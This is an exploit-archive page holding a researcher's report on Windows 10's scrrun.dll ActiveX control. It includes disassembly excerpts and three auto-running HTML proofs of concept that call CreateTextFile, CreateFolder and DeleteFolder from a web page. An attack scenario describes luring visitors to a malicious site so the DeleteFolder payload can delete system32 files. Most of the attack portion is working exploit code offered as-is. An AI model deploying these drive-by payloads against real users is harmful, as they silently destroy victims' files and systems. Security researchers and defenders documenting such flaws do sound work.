Twenty Year Anniversary

Microsoft Windows 10 scrrun.dll Active-X Creation / Deletion Issues

Microsoft Windows 10 scrrun.dll Active-X Creation / Deletion Issues
Posted Jun 6, 2018
Authored by Nassim Asrir

scrrun.dll on Microsoft Windows 10 suffers from file creation, folder creation, and folder deletion vulnerabilities.

tags | exploit, vulnerability, activex
systems | windows
MD5 | 169fb0e802f9cddfb0fe5ba1f5284140

Microsoft Windows 10 scrrun.dll Active-X Creation / Deletion Issues

Change Mirror Download
# Title: Windows 10 'scrrun.dll' Multiple vulnerabilities
# Author: Nassim Asrir
# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.microsoft.com/

Test ENV:
========

Browser : IE 11

OS: Windows 10 - x64

Details:
========

scrrun.dll (C:\Windows\SysWOW64\scrrun.dll) contains 3 vulnerable functions.

1 - CreateTextFile: With this function the attacker will be able to create text files on the victim machine

2 - CreateFolder: With this function the attacker will be able to create folders on the victim machine

3 - DeleteFolder: And with this the attacker will be able to delete any file system on victim machine like ( bootvid.dll ) or any file or folder on system32

Attack scenario
===============

The attacker will not need to use a MITM attack or Social engineering So as a scenario:


1 - The attacker will create a website and he will inject the exploit code on his file (index.php) and if the victime navigate his website he will be affected with malicious code.

2 - The attacker will be able to target big organization because this dll is installed by default on Windows so any Windows OS is affected .

3 - The attacker will be able to affect lots of people by sharing his link via Any social website or in chat room.

Impact:
=====

So as i said first there a vulnerable function named 'DeleteFolder' and using this function the attacker will be able to delete any file or folder on victime machine and if the attacker targeted intersting files in system32 folder the victime will loss his machine.

Exploits:
=========

1- CreateTextFile function
==========================

; Attributes: bp-based frame

; int __stdcall CFileSystem__CreateTextFile(int, BSTR, int, unsigned __int16 *, __int16)
?CreateTextFile@CFileSystem@@UAGJPAGFFPAPAUITextStream@@@Z proc near

var_110= dword ptr -110h
Memory= dword ptr -10Ch
var_108= byte ptr -108h
var_4= dword ptr -4
arg_4= dword ptr 0Ch
arg_8= dword ptr 10h
arg_C= dword ptr 14h
arg_10= word ptr 18h

; FUNCTION CHUNK AT .text:1000BF9D SIZE 0000005E BYTES

mov edi, edi
push ebp
mov ebp, esp
sub esp, 110h
mov eax, ___security_cookie
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, dword ptr [ebp+arg_10]
push edi
mov edi, [ebp+arg_4]
test esi, esi
jz short loc_10009700

Note: I used the 'onload Event' to work the exploit automatically.

This function contain 3 args and the attacker will be able to control the value:

Function CreateTextFile (
ByVal FileName As String ,
ByVal Overwrite As Boolean ,
ByVal Unicode As Boolean
)

in our poc we controlled the FileName Parameter.

<title>scrrun.dll Multiple Vulnerabilities</title>
<BODY onload=exploit()>
<object id=rce classid="clsid:{0D43FE01-F093-11CF-8940-00A0C9054228}"></object>

<SCRIPT>

function exploit()
{

rce.CreateTextFile("C:\\Users\\ZS-002\\Desktop\\test.txt")


}

</SCRIPT>
</body>
</body>
</HTML>

2- CreateFolder Function:
=========================

; Attributes: bp-based frame

; int __fastcall DoCreateFolder(LPCWSTR lpPathName)
?DoCreateFolder@@YGJPBGPAPAUIFolder@@@Z proc near

var_4= byte ptr -4

mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, edx
mov esi, ecx
call ?IsUNC@@YGHPBG@Z ; IsUNC(ushort const *)
test eax, eax
jz short loc_1001AB21

This function contain one paramter and also the attacker will be able to control it.


Function CreateFolder (
ByVal Path As String
) As IFolder


This exploit will create a folder named 'test' on Desktop.

<title>scrrun.dll Multiple Vulnerabilities</title>
<BODY onload=exploit()>
<object id=rce classid="clsid:{0D43FE01-F093-11CF-8940-00A0C9054228}"></object>

<SCRIPT>

function exploit()
{

rce.CreateFolder("C:\\Users\\ZS-002\\Desktop\\test")


}

</SCRIPT>
</body>
</body>
</HTML>

3- DeleteFolder function
========================

.text:1001AC24
.text:1001AC24 ; Attributes: bp-based frame
.text:1001AC24
.text:1001AC24 ; int __fastcall DoDeleteFolder(wchar_t *Src)
.text:1001AC24 ?DoDeleteFolder@@YGJPBGH@Z proc near ; CODE XREF: CFileSystem::DeleteFolder(ushort *,short)+3Ap
.text:1001AC24 ; FolderObject::Delete(short)+2Fp
.text:1001AC24
.text:1001AC24 var_488 = byte ptr -488h
.text:1001AC24 var_484 = dword ptr -484h
.text:1001AC24 var_480 = dword ptr -480h
.text:1001AC24 var_474 = dword ptr -474h
.text:1001AC24 var_470 = dword ptr -470h
.text:1001AC24 Memory = dword ptr -46Ch
.text:1001AC24 var_468 = byte ptr -468h
.text:1001AC24 var_260 = dword ptr -260h
.text:1001AC24 var_25C = dword ptr -25Ch
.text:1001AC24 var_258 = dword ptr -258h
.text:1001AC24 var_4 = dword ptr -4
.text:1001AC24
.text:1001AC24 mov edi, edi
.text:1001AC26 push ebp
.text:1001AC27 mov ebp, esp
.text:1001AC29 sub esp, 488h
.text:1001AC2F mov eax, ___security_cookie
.text:1001AC34 xor eax, ebp
.text:1001AC36 mov [ebp+var_4], eax
.text:1001AC39 push ebx
.text:1001AC3A mov [ebp+var_484], edx
.text:1001AC40 mov ebx, ecx
.text:1001AC42 push edi
.text:1001AC43 lea edx, [ebp+var_488]
.text:1001AC49 call ?GetNameSubstring@@YGPBGPBGPAH@Z ; GetNameSubstring(ushort const *,int *)
.text:1001AC4E mov edi, eax
.text:1001AC50 test edi, edi
.text:1001AC52

This function is the dangerous function with this exploit the attacker will be able to delete any file or folder on victim machine also on system32 folder.


This exploit will delete a folder named test

<title>scrrun.dll Multiple Vulnerabilities</title>
<BODY onload=exploit()>
<object id=rce classid="clsid:{0D43FE01-F093-11CF-8940-00A0C9054228}"></object>

<SCRIPT>

function exploit()
{

rce.DeleteFolder("C:\\Users\\ZS-002\\Desktop\\test")


}

</SCRIPT>
</body>
</body>
</HTML>

#EOF and thnks for reading my report.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close